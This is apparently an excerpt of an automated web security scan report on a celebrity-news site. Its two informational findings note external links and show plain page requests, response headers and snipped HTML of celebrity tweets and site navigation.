<span class="source"> via <a href="http://twitter.com/LoBosworth/statuses/31474891412738048">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: <a href="http://twitter.com/racheljosephf">@racheljosephf</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31474364587180033">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: <a href="http://twitter.com/barbara230">@barbara230</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31474068645478400">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: RT <a href="http://twitter.com/AIDSPolicyProj">@AIDSPolicyProj</a>: <a href="http://twitter.com/samantharonson">@samantharonson</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31473906485297152">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: RT <a href="http://twitter.com/AIDSPolicyProj">@AIDSPolicyProj</a>: <a href="http://twitter.com/samantharonson">@samantharonson</a> Egyptian activists are cobbling together their own internet: <a href="http://bit.ly/e3toNb">http://bit.ly/e3toNb</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31473844573179904">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15856_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/mccordalex">mccordalex</a>: <a href="http://twitter.com/Punch800">@Punch800</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/mccordalex/statuses/31471195719208960">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7477_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/iamdiddy">iamdiddy</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/iamdiddy/statuses/31469852891807744">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7895_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/SarahKSilverman">SarahKSilverman</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/SarahKSilverman/statuses/31469730384580608">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/18487_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/MirandaBuzz">MirandaBuzz</a>: A picture of towel art in the hotel. The elephant in the room. ;) <a href="http://yfrog.com/hsi3mlfj">http://yfrog.com/hsi3mlfj</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/MirandaBuzz/statuses/31469606199623680">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/32972_Module1x1_634164434770437095.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/KimKardashian">KimKardashian</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/KimKardashian/statuses/31468574493114368">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/32972_Module1x1_634164434770437095.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/KimKardashian">KimKardashian</a>: Hate when that happens! Lol RT <a href="http://twitter.com/CarlaDiBello">@CarlaDiBello</a> RT <a href="http://twitter.com/PeterGriffinn">@PeterGriffinn</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/KimKardashian/statuses/31468288559030272">Twitter</a>
...[SNIP]...
<li><a href="http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3">Tailgating time: 10 winning recipes</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr1-5">Bing video: Celebrity gridiron fans</a>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" >BLTWY</a>
...[SNIP]...
<li class="hasMenu" id="hasMenu2"><a href="http://msn.foxsports.com/" class="hasMenuLink">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" >MLB</a></li><li><a href="http://msn.foxsports.com/nascar " >NASCAR</a></li><li><a href="http://msn.foxsports.com/nba" >NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball" >NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb" >NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl" >NFL</a></li><li><a href="http://msn.foxsports.com/nhl" >NHL</a></li><li><a href="http://msn.foxsports.com/fantasy" >Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer" >Soccer</a></li><li class="last"><a href="http://msn.foxsports.com/video?from=en-us_msnhp" >Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" >Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/" > Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " > Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" >Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" >Video</a>
...[SNIP]...
<li class="last"><a href="http://insidemsn.wordpress.com" >Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/" >White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/" >Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2" >Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " >Travel</a>
...[SNIP]...
<li class="bingLink last"><a href="http://www.bing.com/search?FORM=CWWWBQ" >Bing</a>
...[SNIP]...
<li><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank" class="pass">MSN Privacy</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx" onclick="window.open(this.href,'help','width=960,height=720,resizeable=yes,status=no,titlebar=no,toolbar=no'); return false;" class="ignore" target="blank">Help</a>
...[SNIP]...
</p><a href="http://microsoft.com" >Microsoft</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

22.367. http://wonderwall.redacted/tv/locane-pleads-not-guilty-over-fatal-car-crash-1594051.story

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wonderwall.redacted
Path:   /tv/locane-pleads-not-guilty-over-fatal-car-crash-1594051.story

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /tv/locane-pleads-not-guilty-over-fatal-car-crash-1594051.story?gt1=28135 HTTP/1.1
Host: wonderwall.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 16:55:18 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
Age: 236
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta name="Search.Image" content="http://static.wonderwall.com/photos/Module1x1/32042_Module1x1_634281180167118681.jpg" />
<link rel="image_src" href="http://static.wonderwall.com/photos/Module1x1/32042_Module1x1_634281180167118681.jpg" />

<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<link rel="stylesheet" media="only screen and (max-device-width: 480px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
<link rel="stylesheet" media="only screen and (min-device-width: 481px) and (max-device-width: 1024px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
</head>
...[SNIP]...
<span><img src="http://static.wonderwall.com/photos/Original/32042_Original.jpg" class="imgSrc-http://static.wonderwall.com/photos/Original/32042_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/32043_Original.jpg" alt="" /></span>
...[SNIP]...
<span><img src="http://static.wonderwall.com/cache/img/clear1x1_1283311127.gif" class="imgSrc-http://static.wonderwall.com/photos/Original/43564_Original.jpg" alt="/" /></span>
...[SNIP]...
<li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?original_referer=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Flocane-pleads-not-guilty-over-fatal-car-crash-1594051.story%3Focid%3Dtwtr-utweet" class="twitterProxy"></a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Flocane-pleads-not-guilty-over-fatal-car-crash-1594051.story" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=Amy+Locane+pleads+not+guilty+over+fatal+car+crash&url=http%3A%2F%2Fwonderwall.msn.com%2Ftv%2Flocane-pleads-not-guilty-over-fatal-car-crash-1594051.story" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Amy+Locane+pleads+not+guilty+over+fatal+car+crash&u=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Flocane-pleads-not-guilty-over-fatal-car-crash-1594051.story" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=Amy+Locane+pleads+not+guilty+over+fatal+car+crash&url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Flocane-pleads-not-guilty-over-fatal-car-crash-1594051.story" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fwonderwall.redacted%2Ftv%2Flocane-pleads-not-guilty-over-fatal-car-crash-1594051.story" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=Amy+Locane+pleads+not+guilty+over+fatal+car+crash&url=http%3A%2F%2Fwonderwall.msn.com%2Ftv%2Flocane-pleads-not-guilty-over-fatal-car-crash-1594051.story" target="_blank">Reddit</a>
...[SNIP]...
<cite><a href="http://www.wenn.com/">WENN</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/24074_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/NickCannon">NickCannon</a>: <a href="http://twitter.com/TheBatkave">@TheBatkave</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/NickCannon/statuses/31746607615574016">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4422_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/alydenisof">alydenisof</a>: <a href="http://twitter.com/wendyhagen">@wendyhagen</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/alydenisof/statuses/31744920150614016">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4145_Module1x1_634273984962298019.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/yokoono">yokoono</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/yokoono/statuses/31743517785071616">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23114_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Sn00ki">Sn00ki</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Sn00ki/statuses/31737381589614592">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: RT <a href="http://twitter.com/BravoAndy"><a href="http://twitter.com/BravoAndy">@BravoAndy</a></a>: Brand new live at 11:30 after ATL finale with <a href="http://twitter.com/kimzolciak">@kimzolciak</a> and her man Kroy! RT:<a href="http://twitter.com/mikelizonn">@mikelizonn</a>: <a href="http://twitter.com/BravoAndy"><a href="http://twitter.com/BravoAndy">@BravoAndy</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31734736913170432">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: <a href="http://twitter.com/MsBrandi17">@MsBrandi17</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31729553827172352">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: RT <a href="http://twitter.com/BrandonnStRegis">@BrandonnStRegis</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31729214356979713">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/25615_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/DJPaulyD">DJPaulyD</a>: RT <a href="http://twitter.com/Akeel93">@Akeel93</a>: "<a href="http://twitter.com/DJPaulyD">@DJPaulyD</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/DJPaulyD/statuses/31727445837090816">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: :) RT <a href="http://twitter.com/BrandonnStRegis">@BrandonnStRegis</a> EVERY1 tune in2 the 90 minute long SEASON FINALE of RHOA 10pm on Bravo & <a href="http://twitter.com/kimzolciak">@kimzolciak</a> & <a href="http://twitter.com/biermann71">@biermann71</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31726145497989121">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/30371_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Bethenny">Bethenny</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Bethenny/statuses/31719343947522049">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Yes! Lol RT <a href="http://twitter.com/AshNHartz">@AshNHartz</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a> Are you & <a href="http://twitter.com/biermann71">@biermann71</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31716672863731714">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: I was 3 months in this pic RT <a href="http://twitter.com/Please_Stand_By">@Please_Stand_By</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a> This is you recently pregnant? <a href="http://twitpic.com/3uqhh4">http://twitpic.com/3uqhh4</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31716118221561856">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/8376_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/BowWow">BowWow</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/BowWow/statuses/31716032452231168">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31712954776821760">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Yes! Opening for a Huge mega star! I'm beyond excited! RT <a href="http://twitter.com/iutrav">@iutrav</a>: <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31712647732797440">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: Ur a doll! RT <a href="http://twitter.com/JoshGottlieb">@JoshGottlieb</a>: Fun day! Thank you <a href="http://twitter.com/BrielleZolciak">@BrielleZolciak</a>, <a href="http://twitter.com/arianazolciak">@arianazolciak</a> <a href="http://twitter.com/biermann71">@biermann71</a> and <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31712300427644928">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/19056_Module1x1_634063250194243199.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Kimzolciak">Kimzolciak</a>: RT <a href="http://twitter.com/AtlantaPlaces">@AtlantaPlaces</a>: Club Life is buzzing again: <a href="http://sch.mp/0jHde">http://sch.mp/0jHde</a> - RT <a href="http://twitter.com/KingLj11">@KingLj11</a> Me and <a href="http://twitter.com/Kimzolciak">@Kimzolciak</a> @ club Life!! <a href="http://twitpic.com/3uqhh4">http://twitpic.com/3uqhh4</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Kimzolciak/statuses/31711564050472961">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23936_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Jillzarin">Jillzarin</a>: On plane wish i could call in!RT <a href="http://twitter.com/lxnewyork">@lxnewyork</a> Getting ready to chat with our favorite sunday morning show <a href="http://twitter.com/lxtvopenho">@lxtvopenho</a>... <a href="http://tl.gd/8g30qb">http://tl.gd/8g30qb</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Jillzarin/statuses/31705598416392194">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/23936_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/Jillzarin">Jillzarin</a>: So happy. Flying <a href="http://twitter.com/continental">@continental</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/Jillzarin/statuses/31705092302315520">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4884_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/davenavarro6767">davenavarro6767</a>: <a href="http://twitter.com/Banshee_Song">@Banshee_Song</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/davenavarro6767/statuses/31690324585742336">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4884_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/davenavarro6767">davenavarro6767</a>: <a href="http://twitter.com/buddyhead">@buddyhead</a> <a href="http://youtu.be/fX_120DMFDQ">http://youtu.be/fX_120DMFDQ</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/davenavarro6767/statuses/31688081048342528">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4884_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/davenavarro6767">davenavarro6767</a>: <a href="http://twitter.com/ipierce89">@ipierce89</a> Oh no! Yur not DRIVING <a href="http://twitter.com/OMGitsjessielee">@OMGitsjessielee</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/davenavarro6767/statuses/31674584327528449">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4483_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/joshgroban">joshgroban</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/joshgroban/statuses/31672009905672192">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/4483_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/joshgroban">joshgroban</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/joshgroban/statuses/31671556916645888">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/44221_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rzrachelzoe">rzrachelzoe</a>: RT <a href="http://twitter.com/prabalgurung">@prabalgurung</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rzrachelzoe/statuses/31667825831579649">Twitter</a>
...[SNIP]...
<li><a href="http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3">Tailgating time: 10 winning recipes</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr1-5">Bing video: Celebrity gridiron fans</a>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" >BLTWY</a>
...[SNIP]...
<li class="hasMenu" id="hasMenu2"><a href="http://msn.foxsports.com/" class="hasMenuLink">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" >MLB</a></li><li><a href="http://msn.foxsports.com/nascar " >NASCAR</a></li><li><a href="http://msn.foxsports.com/nba" >NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball" >NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb" >NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl" >NFL</a></li><li><a href="http://msn.foxsports.com/nhl" >NHL</a></li><li><a href="http://msn.foxsports.com/fantasy" >Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer" >Soccer</a></li><li class="last"><a href="http://msn.foxsports.com/video?from=en-us_msnhp" >Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" >Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/" > Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " > Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" >Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" >Video</a>
...[SNIP]...
<li class="last"><a href="http://insidemsn.wordpress.com" >Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/" >White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/" >Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2" >Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " >Travel</a>
...[SNIP]...
<li class="bingLink last"><a href="http://www.bing.com/search?FORM=CWWWBQ" >Bing</a>
...[SNIP]...
<li><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank" class="pass">MSN Privacy</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx" onclick="window.open(this.href,'help','width=960,height=720,resizeable=yes,status=no,titlebar=no,toolbar=no'); return false;" class="ignore" target="blank">Help</a>
...[SNIP]...
</p><a href="http://microsoft.com" >Microsoft</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

22.368. http://wonderwall.redacted/tv/ugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wonderwall.redacted
Path:   /tv/ugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /tv/ugly-love-the-courtship-of-jesse-james-and-kat-von-d-11117.gallery?gt1=28135 HTTP/1.1
Host: wonderwall.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 16:56:30 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
Age: 166
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta name="medium" content="image" />
<link rel="image_src" href="http://static.wonderwall.com/photos/Original/45347_Original.jpg" />

<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<link rel="stylesheet" media="only screen and (max-device-width: 480px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
<link rel="stylesheet" media="only screen and (min-device-width: 481px) and (max-device-width: 1024px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
</head>
...[SNIP]...
<span><img src="http://static.wonderwall.com/photos/Original/45347_Original.jpg" class="imgSrc-http://static.wonderwall.com/photos/Original/45347_Original.jpg" alt="By Drew MackieYou know how it's awkward to see couples getting all handsy and kissy in public? Thanks to Jesse James and Kat Von D, this uncomfortable situation has been reproduced on Twitter. Yes, it's e-PDA, with all the gooey, sloppy show-offiness of a shameless couple in heat but delivered to your computers and phones. Click through to follow the exchange, but pace yourself: The out-of-character syrupy sweetness may overwhelm even the hardiest of constitutions.@FreeJesseJames: Done, off to the paint shop in the morning. @TheKatVonD: just so you know, you're impressing the hell outta me...Subtext: Kat Von D is easily impressed, given that going to various auto shop locations is part of Jesse James's daily work. Then again, look who she's dating. Her standards for impressive are clearly low.RELATED: See if Kat's blue dye job is a Hairdo or Hair Don't" /></span>
...[SNIP]...
<P ALIGN="LEFT">You know how it's awkward to see couples getting all handsy and kissy in public? Thanks to <A HREF="http://twitter.com/freejessejames" TARGET="_blank">Jesse James</A> and <A HREF="http://twitter.com/thekatvond" TARGET="_blank">Kat Von D</A>
...[SNIP]...
<b>@<A HREF="http://twitter.com/thekatvond" TARGET="_blank">TheKatVonD:</A>
...[SNIP]...
